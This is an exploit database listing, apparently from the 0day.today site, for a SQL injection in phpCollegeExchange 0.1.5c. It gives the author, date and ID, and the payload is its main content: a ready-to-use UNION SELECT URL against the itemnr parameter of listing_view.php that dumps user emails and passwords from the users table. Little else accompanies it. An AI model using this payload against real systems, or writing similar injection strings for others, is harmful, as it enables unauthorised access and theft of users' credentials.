[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

phpCollegeExchange 0.1.5c (listing_view.php itemnr) SQL Injection Vuln

Author
SirGod
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-5378
Category
web applications
Date add
14-06-2009
Platform
unsorted
======================================================================
phpCollegeExchange 0.1.5c (listing_view.php itemnr) SQL Injection Vuln
======================================================================


#################################################################################################################
[+] phpCollegeExchange 0.1.5c (listing_view.php itemnr) SQL Injection Vulnerability
[+] Discovered By SirGod 
#################################################################################################################

[+] Script homepage : http://phpcollegeex.sourceforge.net/

[+] SQL Injection 

   http://127.0.0.1/[path]/house/listing_view.php?itemnr=null+union+all+select+1,2,3,concat(email,0x3a,0x3a,0x3a,password),5,6,7,8,9,10+from+users--

#################################################################################################################



#  0day.today [2024-12-25]  #